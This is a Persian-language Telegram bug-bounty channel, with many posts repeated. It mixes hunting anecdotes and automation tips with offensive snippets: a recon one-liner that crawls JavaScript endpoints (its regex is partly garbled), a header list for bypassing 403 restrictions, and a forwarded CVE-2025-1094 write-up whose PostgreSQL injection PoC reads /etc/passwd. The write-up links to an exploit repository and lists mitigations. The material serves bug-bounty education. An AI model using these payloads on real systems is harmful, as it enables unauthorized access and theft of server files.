یه تجربه جدید که من توی باگ بانتی ایران کسب کردم این بود که روی یه تارگت معروف ایرانی کار میکردم و باگ زدم و خب به پشتیبان گفتم و گفت که شمارتو به تیم فنی دادیم تا بهت زنگ بزنن منتظر باش زنگت میزنن بعد از حدود 30 روز زنگ زدن و اینا من گزارش رو فرستادم و بعد از 2 روز بررسی مدیوم در نظر گرفته شد (یه زرنگی هم که کردم توی ویدیو POC سایت time.ir رو هم باز کرده بودم و تاریخ و ساعت بود) حالا بعداز سی و اندی روز خبر رسیده که بجز من یه هانتر دیگه هم همین باگ منو گزارش کرده و خب طبق بررسی ها تصمیم گرفتن که بانتی رو نصف کنن (نمیدونم قانون باگ بانتی رو میدونید یا نه ولی چیزی وجود داره به نام دوپلیکیت) و جالبش اینجاست که من سریع تر از اون هانتر باگ رو پیدا کرده بودم
اینو میخاستم بگم که اتفاقات توی باگ بانتی ایران نرمال نیست پس اگر کار میکنید خیلی فشار روحی روانی روی خودتون وارد نکنید
#تجربه
اینو میخاستم بگم که اتفاقات توی باگ بانتی ایران نرمال نیست پس اگر کار میکنید خیلی فشار روحی روانی روی خودتون وارد نکنید
#تجربه
Forwarded from اینترنت آزاد،تکنولوژی،هوش مصنوعی،کامپیوتر
نیاز به ثبت نام نداره و مهم تر از همه داخل ایران هم تحریم نیست.
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 ماشین گزارش شفافیت تلگرام با آدرس زیر به شما میگه براساس ایپی شما و/یا شماره تلفن شما چه تعداد درخواست از طرف دولت دریافت کرده و چه تعداد کاربر بابت اون درخواست اطلاعاتشان به دولت داده شده.
t.me/transparency
#کاربردی
t.me/transparency
#کاربردی
Telegram
Transparency Reports
Get Telegram transparency reports.
برای اتومیشن و نوشتن اتومیشن برای کارتون باید اول اول ایده رو کامل بنویسید که دقیق چه ایده ای دارید و باید چه قابلیت و کارایی داشته باشه و بعد یه زبان انتخاب میکنی که من خودم پایتون و گو رو ترکیبی نوشتم و پیشنهادم به شما هم همین ترکیبی نوشتنه
حالا چیو اتومیت کنیم؟ 🤔
معمولا در قسمت واید ریکان اتومیشن رو مینويسن و قسمتی هم توی اسکن آسیب پذیری برای مثال توی واید ریکان من خودم اینارو نوشتم :
+ subdomain enumeration
+ name resulation
+ service Discovery
+ Http Discovery
+ Grabe Fresh asset
+ push on the database
+ updater target Programs
+ notidication on telegram&discord
+ connection on Telegram bot
+ save Subdomain on file
+ vulnerabilities Discovery
اینا رو اضافه کردم که قسمتی از اتومیشن من هستند ولی اینو درنظر بگیرید که هرکدوم به شاخه های بزرگی تقسیم میشن مثلا Subdomain enumeration خودش رو من با 8 تا پرووایدر انجام میدم هر آنچیزی که مهمه رو نوشتم و از 8 تا پرووایدر قول جهان سابدامین میگیرم، بگذریم
توی اتومیشن اگه میخاین به باگ نخورین این توصیه های منه :
اینا نمونه توصیه های منه حالا که یکیشو توضیح میدم چرا از پایچارم استفاده کنیم؟ چون که هوش مصنوعی پایچارم باعث میشه بیستون رو درست و سریع بنویسین چرا؟ چون 95 درصد کد هایی که توی دیتابیس میزنید رو خودش حدس میزنه و اینطوری راحت تره کد زدن و نصب پکیج روش راحت تره! و در آخر باگ بزنید و مطالعه کنید.
یا علی
#تجربه
#کاربردی
#توصیه
حالا چیو اتومیت کنیم؟ 🤔
معمولا در قسمت واید ریکان اتومیشن رو مینويسن و قسمتی هم توی اسکن آسیب پذیری برای مثال توی واید ریکان من خودم اینارو نوشتم :
+ subdomain enumeration
+ name resulation
+ service Discovery
+ Http Discovery
+ Grabe Fresh asset
+ push on the database
+ updater target Programs
+ notidication on telegram&discord
+ connection on Telegram bot
+ save Subdomain on file
+ vulnerabilities Discovery
اینا رو اضافه کردم که قسمتی از اتومیشن من هستند ولی اینو درنظر بگیرید که هرکدوم به شاخه های بزرگی تقسیم میشن مثلا Subdomain enumeration خودش رو من با 8 تا پرووایدر انجام میدم هر آنچیزی که مهمه رو نوشتم و از 8 تا پرووایدر قول جهان سابدامین میگیرم، بگذریم
توی اتومیشن اگه میخاین به باگ نخورین این توصیه های منه :
+ از mongoDB به عنوان دیتابیس استفاده کنید
+ از گو برای ماژول ها استفاده کنید
+ با پایتون سینک کنید اتومیشن تون رو
+ حتما یه اسکریپت برای آپدیت مستقیم پروگرام هاتون توی دیتابیس بنویسین
+ یه اسکریپت برای حذف کل پروگرام به همراه دیتا بیسش بنویسین
+ پایتون زبان قدرتمندیه خلاقانه و قوی کد بزنید
+ چت جی پی تی رو بغل کنید چون خیلی جاها کمکتون میکنه
+ از پایچارم استفاده کنید
اینا نمونه توصیه های منه حالا که یکیشو توضیح میدم چرا از پایچارم استفاده کنیم؟ چون که هوش مصنوعی پایچارم باعث میشه بیستون رو درست و سریع بنویسین چرا؟ چون 95 درصد کد هایی که توی دیتابیس میزنید رو خودش حدس میزنه و اینطوری راحت تره کد زدن و نصب پکیج روش راحت تره! و در آخر باگ بزنید و مطالعه کنید.
یا علی
#تجربه
#کاربردی
#توصیه
استخراج. تمامی مسیر ها و اند پوینت ها از فایل های JS برای گیدا کردن باگ🐞
✅Method one
✅Method two
#کاربردی
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
✅Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#کاربردی
Life and Learning🎭
برای اتومیشن و نوشتن اتومیشن برای کارتون باید اول اول ایده رو کامل بنویسید که دقیق چه ایده ای دارید و باید چه قابلیت و کارایی داشته باشه و بعد یه زبان انتخاب میکنی که من خودم پایتون و گو رو ترکیبی نوشتم و پیشنهادم به شما هم همین ترکیبی نوشتنه حالا چیو اتومیت…
یه توصیه ای که توی این پست ننوشتم این بود که از کوئری زدن فرار کنید
و با ORM ها بنویسینش من خودم با ORM و flask نوشتم
#تجربه
و با ORM ها بنویسینش من خودم با ORM و flask نوشتم
#تجربه
🌋403 Bypass by Header Requests
#کاربردی
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
#کاربردی
Forwarded from اینترنت آزاد،تکنولوژی،هوش مصنوعی،کامپیوتر
🔻سرقت از ۵۶۰۰ حساب بانکی توسط هکر ۱۸ ساله همدانی
فرمانده انتظامی همدان از دستگیری یک کلاهبردار اینترنتی ۱۸ ساله خبرداد که با ارسال ۲۵۰ هزار لینک آلوده اطلاعات بیش از ۵ هزار و ۶۰۰ حساب بانکی را سرقت کرده است.
این فرد با فریب بیش از ۳۰ نفر، از حسابهای آنها بهعنوان حسابهای پوششی برای پولشویی استفاده کرده و درنهایت وجوه سرقتشده را به ارز دیجیتال تبدیل میکرد.
✈️ @ITSecurityComputer
🤖 ربات دانلود از همه شبکه های اجتماعی
🧠 ربات هوش مصنوعی چت وعکس
فرمانده انتظامی همدان از دستگیری یک کلاهبردار اینترنتی ۱۸ ساله خبرداد که با ارسال ۲۵۰ هزار لینک آلوده اطلاعات بیش از ۵ هزار و ۶۰۰ حساب بانکی را سرقت کرده است.
این فرد با فریب بیش از ۳۰ نفر، از حسابهای آنها بهعنوان حسابهای پوششی برای پولشویی استفاده کرده و درنهایت وجوه سرقتشده را به ارز دیجیتال تبدیل میکرد.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from HiveNews | خبر کندو 🐝
This media is not supported in your browser
VIEW IN TELEGRAM
حال انتظار داری آنها را دوس بدارم؟
پروکسی 👉 پروکسی 👉 پروکسی پر سرعت 👉 پروکسی سرعت بالا 👉
دانلودچی 👉 vpn اختصاصی رایگان 👉
پروکسی 👉 پروکسی 👉 پروکسی پر سرعت 👉 پروکسی سرعت بالا 👉
دانلودچی 👉 vpn اختصاصی رایگان 👉
از تجربیاتم بخام بگم توی ایران پروژه ای بوده که باگ بانتی من کار کردم روشون حالا یه سری باگ زدم و گزارش کروم بانتیش 2 ماه بعد واریز کردن تو ایران این مشکلات رو هم داریم دوستان
که حالا بعضیا هستن فردای گزارشت میریزن بعضیا دیر تر میریزن دلیل بر بدی و خوبی نیست دلیل بر اینه که خود ایران شرکت ها جرعت نمیکنن واریز بکنن با این افزایش قیمت میگن بزار باشه سرمایس یه مقداری
ولی در کل اگر یه شرکتی دیر کرد واریزی داشت فکر نکنین پولتون خورده (البته اگر جوابتون میدن ولی اگر نمیدن که بیخیالش بشین)
#تجربه
که حالا بعضیا هستن فردای گزارشت میریزن بعضیا دیر تر میریزن دلیل بر بدی و خوبی نیست دلیل بر اینه که خود ایران شرکت ها جرعت نمیکنن واریز بکنن با این افزایش قیمت میگن بزار باشه سرمایس یه مقداری
ولی در کل اگر یه شرکتی دیر کرد واریزی داشت فکر نکنین پولتون خورده (البته اگر جوابتون میدن ولی اگر نمیدن که بیخیالش بشین)
#تجربه
Forwarded from GO-TO CVE (Ali Soltani)
بررسی آسیبپذیری SQL Injection در PostgreSQL و ارتقای آن به RCE با WebSocket🚀
سلام به همه دوستان عزیز! 🌟
در هفته 41 از برنامه GO-TO CVE، به سراغ یک آسیبپذیری خطرناک در PostgreSQL رفتیم که در نگاه اول تنها یک SQL Injection ساده بود، اما با یک زنجیره حمله حرفهای توانستیم آن را به Remote Code Execution (RCE) ارتقا دهیم! 😈
📱 Week: 41
🔍 CVE: CVE-2025-1094
💻 Type: SQL Injection → Remote Code Execution
🛠 DBMS: PostgreSQL
🔥 چگونه از یک SQLi ساده به RCE رسیدیم؟
در ابتدا، این آسیبپذیری به ما اجازه میداد دستورات SQL مخرب را تزریق کنیم و اطلاعات حساس پایگاه داده را استخراج کنیم. اما ما به همینجا قانع نشدیم! با استفاده از چین اتک و ترکیب چندین آسیبپذیری دیگر، از جمله یک ضعف در WebSocket، توانستیم کنترل کامل سرور را به دست بگیریم و کد دلخواه خود را اجرا کنیم!
📌 جزئیات فنی آسیبپذیری:
1️⃣ این ضعف به مهاجم اجازه میدهد از طریق ورودیهای ناامن، کد SQL را مستقیماً در پایگاه داده اجرا کند.
2️⃣ در PostgreSQL، قابلیتهایی مانند COPY FROM PROGRAM و lo_export() میتوانند در برخی تنظیمات نادرست، مسیر را برای RCE باز کنند.
3️⃣ ما از WebSocket hijacking استفاده کردیم تا بدون نیاز به سطح دسترسی بالا، این زنجیره حمله را به کد اجرایی روی سرور برسانیم.
🔗 PoC و اثبات اجرا روی سرور
🚀 برای تست این آسیبپذیری، ما یک WebSocket payload ساختیم که ارتباط بین کلاینت و سرور را Hijack میکرد. سپس با تزریق SQLi، یک توابع ناامن در PostgreSQL را فراخوانی کرده و در نهایت Shell Reverse گرفتیم! 😈
📜 PoC:
SELECT lo_export( (SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')), '/tmp/payload');
🔥 اجرای این کد در محیط آسیبپذیر، امکان خواندن فایلهای حساس سرور و در نهایت اجرای کد را فراهم میکند. برای درک بهتر و exploit کامل به ریپازیتوری زیر مراجعه کنید .
https://github.com/soltanali0/CVE-2025-1094-Exploit/tree/main
🔒 چگونه از این آسیبپذیری در امان بمانیم؟
✅ Prepared Statements را جایگزین کوئریهای مستقیم کنید.
✅ ورودی کاربران را اعتبارسنجی کنید و از فیلترهای امنیتی مناسب استفاده کنید.
✅ دسترسی به توابع حساس PostgreSQL را محدود کنید.
✅ WebSocketها را ایمن کنید و از ارسال اطلاعات حساس در آنها خودداری کنید.
✅ آخرین آپدیتهای PostgreSQL را نصب کنید و پیکربندیهای امنیتی را بررسی کنید.
📢 همراه ما باشید و امنیت خود را به سطح بالاتری ببرید! 🔒
🔗 پیوستن به کانال تلگرام:
https://news.1rj.ru/str/GOTOCVE
سلام به همه دوستان عزیز! 🌟
در هفته 41 از برنامه GO-TO CVE، به سراغ یک آسیبپذیری خطرناک در PostgreSQL رفتیم که در نگاه اول تنها یک SQL Injection ساده بود، اما با یک زنجیره حمله حرفهای توانستیم آن را به Remote Code Execution (RCE) ارتقا دهیم! 😈
📱 Week: 41
🔍 CVE: CVE-2025-1094
💻 Type: SQL Injection → Remote Code Execution
🛠 DBMS: PostgreSQL
🔥 چگونه از یک SQLi ساده به RCE رسیدیم؟
در ابتدا، این آسیبپذیری به ما اجازه میداد دستورات SQL مخرب را تزریق کنیم و اطلاعات حساس پایگاه داده را استخراج کنیم. اما ما به همینجا قانع نشدیم! با استفاده از چین اتک و ترکیب چندین آسیبپذیری دیگر، از جمله یک ضعف در WebSocket، توانستیم کنترل کامل سرور را به دست بگیریم و کد دلخواه خود را اجرا کنیم!
📌 جزئیات فنی آسیبپذیری:
1️⃣ این ضعف به مهاجم اجازه میدهد از طریق ورودیهای ناامن، کد SQL را مستقیماً در پایگاه داده اجرا کند.
2️⃣ در PostgreSQL، قابلیتهایی مانند COPY FROM PROGRAM و lo_export() میتوانند در برخی تنظیمات نادرست، مسیر را برای RCE باز کنند.
3️⃣ ما از WebSocket hijacking استفاده کردیم تا بدون نیاز به سطح دسترسی بالا، این زنجیره حمله را به کد اجرایی روی سرور برسانیم.
🔗 PoC و اثبات اجرا روی سرور
🚀 برای تست این آسیبپذیری، ما یک WebSocket payload ساختیم که ارتباط بین کلاینت و سرور را Hijack میکرد. سپس با تزریق SQLi، یک توابع ناامن در PostgreSQL را فراخوانی کرده و در نهایت Shell Reverse گرفتیم! 😈
📜 PoC:
SELECT lo_export( (SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')), '/tmp/payload');
🔥 اجرای این کد در محیط آسیبپذیر، امکان خواندن فایلهای حساس سرور و در نهایت اجرای کد را فراهم میکند. برای درک بهتر و exploit کامل به ریپازیتوری زیر مراجعه کنید .
https://github.com/soltanali0/CVE-2025-1094-Exploit/tree/main
🔒 چگونه از این آسیبپذیری در امان بمانیم؟
✅ Prepared Statements را جایگزین کوئریهای مستقیم کنید.
✅ ورودی کاربران را اعتبارسنجی کنید و از فیلترهای امنیتی مناسب استفاده کنید.
✅ دسترسی به توابع حساس PostgreSQL را محدود کنید.
✅ WebSocketها را ایمن کنید و از ارسال اطلاعات حساس در آنها خودداری کنید.
✅ آخرین آپدیتهای PostgreSQL را نصب کنید و پیکربندیهای امنیتی را بررسی کنید.
📢 همراه ما باشید و امنیت خود را به سطح بالاتری ببرید! 🔒
🔗 پیوستن به کانال تلگرام:
https://news.1rj.ru/str/GOTOCVE
GitHub
GitHub - soltanali0/CVE-2025-1094-Exploit: WebSocket and SQL Injection Exploit Script
WebSocket and SQL Injection Exploit Script. Contribute to soltanali0/CVE-2025-1094-Exploit development by creating an account on GitHub.
دوستان هم اکنون آهو آهو بعد از یه مدت طولانی که گزارش میدادم و informative میگرفتم یه آسیب پذیری زدم که قطعا یا دوپلیکیت میشه یا تریاژ
قبلا از همین پروگرام باگ One click Account Take Over زده بودم که چون دامنش Out Of Scope بود قبولش نکردن ولی خب N/A هم نزدن زدنش Infoative ولی این یکی یا تریاژ میشه یا دوپلیکیت
انشالله که تریاژ شه اولین باگ روی هکروان! یالله بگیم به هکروان
https://x.com/CountMoteVaziri/status/1895452700797767816
#تجربه
#سرگرمی
قبلا از همین پروگرام باگ One click Account Take Over زده بودم که چون دامنش Out Of Scope بود قبولش نکردن ولی خب N/A هم نزدن زدنش Infoative ولی این یکی یا تریاژ میشه یا دوپلیکیت
انشالله که تریاژ شه اولین باگ روی هکروان! یالله بگیم به هکروان
https://x.com/CountMoteVaziri/status/1895452700797767816
#تجربه
#سرگرمی
رایت آپ چالش یاشار رو نوشتم انشالله بعد از اتمام چالش میزارم رایت آپ رو اینجا اگه تونستین برین روش بزنید
6 تا فلگ داره
و تنها هشدار منم اینه که دنبال باگ های سمت سرور بگردید
https://x.com/voorivex/status/1897342814708736205
#چالش_استعدادیابی
6 تا فلگ داره
و تنها هشدار منم اینه که دنبال باگ های سمت سرور بگردید
https://x.com/voorivex/status/1897342814708736205
#چالش_استعدادیابی
X (formerly Twitter)
یاشو (@voorivex) on X
با کلی مشغله و همت حسین، پیکار استعدادیابی کلاس Guts اومد، از طریق لینک زیر در دسترسه. اگه کامل حل کردین و خواستین توی قرعهکشی استعدادیابی شرکت کنین، باید فلگ نهایی رو توی voorivex . academy وارد کنین، برای یادگیری و فان هم کلی چیز داره، دمتون گرم
https…
https…